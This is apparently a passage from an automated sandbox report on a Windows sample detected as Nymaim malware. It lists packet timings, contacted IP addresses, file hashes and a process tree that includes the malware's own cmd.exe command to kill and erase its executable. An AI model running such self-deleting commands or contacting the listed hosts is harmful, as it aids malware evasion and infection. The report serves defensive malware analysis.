                Dec 9, 2022 11:02:15.584557056 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.584567070 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.584583998 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.584594011 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.584611893 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.584620953 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.584640026 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.584649086 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.584665060 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.584676981 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.584692955 CET8049692107.182.129.235192.168.2.4
                • 45.139.105.171
                • 107.182.129.235
                • 171.22.30.106

                Click to jump to process

                Target ID:0
                Start time:11:02:06
                Start date:09/12/2022
                Path:C:\Users\user\Desktop\file.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\Desktop\file.exe
                Imagebase:0x400000
                File size:2460138 bytes
                MD5 hash:71F3A21CCD6E54F8178D3FB65F4849B9
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                Target ID:1
                Start time:11:02:07
                Start date:09/12/2022
                Path:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp" /SL4 $30366 "C:\Users\user\Desktop\file.exe" 2214542 96256
                Imagebase:0x400000
                File size:704000 bytes
                MD5 hash:2C3832FDF847813369EC960CD39C8265
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                Target ID:2
                Start time:11:02:09
                Start date:09/12/2022
                Path:C:\Program Files (x86)\PrintFolders\ntFolders.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\PrintFolders\ntFolders.exe"
                Imagebase:0x400000
                File size:3602504 bytes
                MD5 hash:D9A39F6C4EEDC8F1B89E30D35012D6B4
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.393868626.0000000001740000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.393249857.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.394218193.0000000003160000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 100%, Joe Sandbox ML
                Reputation:low

                Target ID:3
                Start time:11:02:13
                Start date:09/12/2022
                Path:C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\karcA17.exe
                Wow64 process (32bit):true
                Commandline:
                Imagebase:0x11d0000
                File size:73728 bytes
                MD5 hash:3FB36CB0B7172E5298D2992D42984D06
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Antivirus matches:
                • Detection: 50%, ReversingLabs
                Reputation:high

                Target ID:4
                Start time:11:02:47
                Start date:09/12/2022
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /im "ntFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\ntFolders.exe" & exit
                Imagebase:0xd90000
                File size:232960 bytes
                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:5
                Start time:11:02:47
                Start date:09/12/2022
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7c72c0000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:6
                Start time:11:02:47
                Start date:09/12/2022
                Path:C:\Windows\SysWOW64\taskkill.exe
                Wow64 process (32bit):true
                Commandline:taskkill /im "ntFolders.exe" /f
                Imagebase:0x13d0000
                File size:74752 bytes
                MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                No disassembly